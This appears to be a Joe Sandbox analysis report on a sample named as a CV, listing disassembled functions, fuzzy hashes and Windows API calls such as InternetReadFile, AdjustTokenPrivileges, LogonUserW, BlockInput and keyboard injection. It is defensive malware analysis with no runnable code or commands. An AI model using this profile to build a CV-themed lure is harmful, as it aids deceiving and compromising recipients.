Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 27a34bde9815b9a1acd6f908edc5e176c3ecb4f57d5b9c2e63657f6cc2fa1674
Instruction ID: ecf7bdf2bc94b208fe77042c17e75ec7c4142ec39f9a336984bed17b39581176
Opcode Fuzzy Hash: 27a34bde9815b9a1acd6f908edc5e176c3ecb4f57d5b9c2e63657f6cc2fa1674
Instruction Fuzzy Hash: 61A19974016004FADB3B6B2A4CB9EBFAA5CEB42744F628919F902DADD5DF14DC04D272

Function 00344EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,003443BF,00000000), ref: 00344FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00344FD2

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 827edeabb8ff602a10b0a94cc78e124b6103567b8f161c476c52f51d7f6bb282
Instruction ID: 832fdae17435e500a40400f4a0b83061a78236f7ee1f4e6410ada44ae4861f84
Opcode Fuzzy Hash: 827edeabb8ff602a10b0a94cc78e124b6103567b8f161c476c52f51d7f6bb282
Instruction Fuzzy Hash: 9341E675904609BFEB22DE84DC81FBFB7FCEB40754F10402AF605AE181DA71BE8596A0

Function 002F77B0 Relevance: 4.6, APIs: 1, Strings: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002F7921

Strings

\Q:, xrefs: 00371028

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _memmove
String ID: \Q:
API String ID: 4104443479-4283153249
Opcode ID: 77114536916dcadc2d3d6289791c334eadc070f51e40835d392a718ff7f49153
Instruction ID: 3b85f7d18133ccf85f6e59b9617c475131f8e9a5e96c298017e31eec853f320a
Opcode Fuzzy Hash: 77114536916dcadc2d3d6289791c334eadc070f51e40835d392a718ff7f49153
Instruction Fuzzy Hash: A8A27A71A14219CFCB25CF58C8806ADFBB1FF48354F2681AAD959AB390D7749E91CF80

Function 0033E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0033E20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0033E267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0033E2B4

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 139d245c463abdae29458d5e77bf8fa56e443c992ba0a0a48b124396cd3da515
Instruction ID: 041fe9d44f4e10241b29d848ebe1c8def0593040280b91b2cd29cb4924eb12ab
Opcode Fuzzy Hash: 139d245c463abdae29458d5e77bf8fa56e443c992ba0a0a48b124396cd3da515
Instruction Fuzzy Hash: DA216D35A10118EFCB01EFA5D885EEEFBB8FF48310F0484A9E906EB291DB319955CB50

Function 0032B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0030F4EA: std::exception::exception.LIBCMT ref: 0030F51E
Part of subcall function 0030F4EA: __CxxThrowException@8.LIBCMT ref: 0030F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0032B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0032B1AD
GetLastError.KERNEL32 ref: 0032B1BA

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: c9a08fab9ec0121005c6847e5a57c38f3ef49880a359de7214fdb5bd1cc4183d
Instruction ID: 5cee57c504f6c3a65399350e07f92261af198ef70d13135f85050820b29bb04c
Opcode Fuzzy Hash: c9a08fab9ec0121005c6847e5a57c38f3ef49880a359de7214fdb5bd1cc4183d
Instruction Fuzzy Hash: 10119EB2514205AFE729AF64ECD6D2BB7BDFF44710B20852EE49A97640DB70FC41CA60

Function 00336606 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00336623
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00336664
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0033666F

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: b45b9a12b3641a3366f6edc9f86a480e0e0d6521d8747b806d37d6c72342d534
Instruction ID: 5c676e6a1e129c19d51a065f44f40ac0cc9d4abd1951e52a3fb062ee9e26a259
Opcode Fuzzy Hash: b45b9a12b3641a3366f6edc9f86a480e0e0d6521d8747b806d37d6c72342d534
Instruction Fuzzy Hash: CA111E71E01228BFEB118FA5DC45BAEBBFCEB49B50F108156F904E6290D7B05A058BA5

Function 003371FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00337223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0033723A
FreeSid.ADVAPI32(?), ref: 0033724A

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 1640632146327f60f42d20b752425a340886c54dc618ffa3864e375fe6ceb08f
Instruction ID: 4643ae7132412f416977527a2979bf40ce0a6b7d27371b8477d339d2b35edffc
Opcode Fuzzy Hash: 1640632146327f60f42d20b752425a340886c54dc618ffa3864e375fe6ceb08f
Instruction Fuzzy Hash: 91F01776A04209FFDF15DFE4DD89EEEBBBCEF08301F105869A606E2191E2709A448B10

Function 0033F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0033F599
FindClose.KERNEL32(00000000), ref: 0033F5C9

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: e1121b1c8a0597b6c8e8aa49b2b89ca1b488f9daa5d600fa3822ce4d94cd0018
Instruction ID: a1636f66ff5898a10417b1b7989bc18722581ffb9cb97248dab751fe872eb168
Opcode Fuzzy Hash: e1121b1c8a0597b6c8e8aa49b2b89ca1b488f9daa5d600fa3822ce4d94cd0018
Instruction Fuzzy Hash: 1D11C4316002009FD711EF28D849A2EF3E8FF85324F00892EF8A9DB291CB30AD048B81

Function 0033CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0034BE6A,?,?,00000000,?), ref: 0033CEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0034BE6A,?,?,00000000,?), ref: 0033CEB9

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: b01a17fd13f4c5f44a3c38fd4e29ee8a84710ec8de20fe95e8e57fdc599843f9
Instruction ID: 23a81feb70c973bfb0bf781be99db464dc2c76ae5f62a71e32e45fd6bed23c44
Opcode Fuzzy Hash: b01a17fd13f4c5f44a3c38fd4e29ee8a84710ec8de20fe95e8e57fdc599843f9
Instruction Fuzzy Hash: 95F0823511422DABEB219BA4DC89FEA777DBF083A1F004165F919E6181D7709A40CBA0

Function 0033411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00334153
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00334166

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 6418b02b3043e7a5fc9b60c0cd7218001897f229bb2ba964a9fbcdc1f1795a87
Instruction ID: 6f0b5b6a3d91e9216c4328378920d44c3ee2ce79aaf3d091b34b6c202d63f7f5
Opcode Fuzzy Hash: 6418b02b3043e7a5fc9b60c0cd7218001897f229bb2ba964a9fbcdc1f1795a87
Instruction Fuzzy Hash: F3F09A7080034DAFDB068FA0C845BBE7FB4EF00315F00804AF966A6292D779D652DFA0

Function 0032AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0032ACC0), ref: 0032AB99
CloseHandle.KERNEL32(?,?,0032ACC0), ref: 0032ABAB

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 3f61dcfa000f4fc160d75f69c58805c8816383218cd4df54ee45659dce9c5c12
Instruction ID: 988eb4d4288102549af267ec901e9c76f1d9bdf1df37f08dc9e8e4bfb58dfc7d
Opcode Fuzzy Hash: 3f61dcfa000f4fc160d75f69c58805c8816383218cd4df54ee45659dce9c5c12
Instruction Fuzzy Hash: 23E0BF75000510AFE7362F54FC15D767BADEF04320B108429B49985871D7625D90DB50

Function 003181AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00316DB3,-0000031A,?,?,00000001), ref: 003181B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 003181BA

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ca49415d6371e30ca1fcb0015e2934a5141caed3de15e12871dd4d6ac76d815a
Instruction ID: ae9c16104081af6aefa4f22bad99f7b50531d8a2839c14fbeebb7e0688b75b55
Opcode Fuzzy Hash: ca49415d6371e30ca1fcb0015e2934a5141caed3de15e12871dd4d6ac76d815a
Instruction Fuzzy Hash: F5B09235044608ABEB122BA1EC09B587FBCEF08762F004014F60D480618B7254909AA2

Function 0031D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 972645130f3db428a8da38220ee1d8852f40aabcaa10260d018f5f5c958a825b
Instruction ID: 82940e88629f156a2c2446beed90ce687b9a13620f6dde1d8b2b3895f7fefe22
Opcode Fuzzy Hash: 972645130f3db428a8da38220ee1d8852f40aabcaa10260d018f5f5c958a825b
Instruction Fuzzy Hash: 6A32E432D29F014DDB275635D921336A29CAFBB3D4F15D727E819B5DAADB29C4C34100

Function 002F96C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: c7f0db2888ae12355cd974159c11b8b843899e60f798c428370e8150e9cc1918
Instruction ID: 4a1358d26166af92fb12dce54a7b6a656301b6364e4d9de3c2a9a5f340b5c99e
Opcode Fuzzy Hash: c7f0db2888ae12355cd974159c11b8b843899e60f798c428370e8150e9cc1918
Instruction Fuzzy Hash: 7422BA716283059FD725DF24C890B6FF7E4AF84344F10492DFA9A8B291DB71E994CB82

Function 0032038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48bad1253774f98fb00f07b0f01b3b1e6c65e633d8bec47f87f0d0cf2faa0072
Instruction ID: 1cfc603d30f6b9f5271aaa68ce54e7bfc305f45b6a5ebf4df2c6346a8fe37975
Opcode Fuzzy Hash: 48bad1253774f98fb00f07b0f01b3b1e6c65e633d8bec47f87f0d0cf2faa0072
Instruction Fuzzy Hash: CBB1F070D2AF514DD62396399831336B65CAFBB3D5FA1D71BFC2A74D22EB2185834280

Function 0033B6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 0033B6DF

Part of subcall function 0031344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0033BDC3,00000000,?,?,?,?,0033BF70,00000000,?), ref: 00313453
Part of subcall function 0031344A: __aulldiv.LIBCMT ref: 00313473

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 01d9623d99c69545a745fd97ede7b36d44229839c87fa2c7d27da6d28e845a72
Instruction ID: d69851ed6d029e5a12170e089d072e174450fc090696950a504ab848c95208fc
Opcode Fuzzy Hash: 01d9623d99c69545a745fd97ede7b36d44229839c87fa2c7d27da6d28e845a72
Instruction Fuzzy Hash: 3921AF766345108BC72ACF28C881A92F7E5EB95314F248E6DE1E9CF2C0CB74BA05CB54

Function 00346AAF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00346ACA

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: deac5b36f27c5e306bd0ccdb19e0ad4a2f835c423539e206f63f0da584788aa7
Instruction ID: dc45c10b35ea0a7f7d7ae27ce27ea48d4429509be819b33061a16a223d8604a1
Opcode Fuzzy Hash: deac5b36f27c5e306bd0ccdb19e0ad4a2f835c423539e206f63f0da584788aa7
Instruction Fuzzy Hash: 7FE0D8352002046FD700EF5DD405D56F7EDAF74351F04C426F909DB291CAB0F8048B91

Function 003374BB Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 003374DE

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 03b816f4515301dae5b37154488cf7208c47c8c14f6f8d7542d3a0a3401c4b59
Instruction ID: 3cab29a1cf776f8769366e946903a684e865746b88ef9964ad50a2927941d335
Opcode Fuzzy Hash: 03b816f4515301dae5b37154488cf7208c47c8c14f6f8d7542d3a0a3401c4b59
Instruction Fuzzy Hash: 4BD05EE012C30939EC3B17269C8FF76494CF3007C0F828189B082C94C3B8807841A232

Function 0032B106 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0032AD3E), ref: 0032B124

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: dc595d7b5b90597ef02db409f7d60cdcb9ab4f6c0967f9e6825bf9af6661419e
Instruction ID: 53c184b40830529c1b931a9e2395c85d867ed25c9bc4054f3bec9f2176aac80e
Opcode Fuzzy Hash: dc595d7b5b90597ef02db409f7d60cdcb9ab4f6c0967f9e6825bf9af6661419e
Instruction Fuzzy Hash: 81D05E320A460EAEDF024FA4DC02EAE3F6AEB04700F408110FA15D50A0C671D531AB50

Function 0036B340 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32 ref: 0036B352

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: dab36c8ecf601772877ae376067127c2192c199954e4a85065383d38321a3efc
Instruction ID: 48daab598f59ac2b551ac4ca74216df2c712033eb2fe45d1d5cea128d8cd9801
Opcode Fuzzy Hash: dab36c8ecf601772877ae376067127c2192c199954e4a85065383d38321a3efc
Instruction Fuzzy Hash: D1C04CB1400509DFC752CBC0C9449EEB7BCAB04701F1050919106F1110D7709B859F72

Function 00318189 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

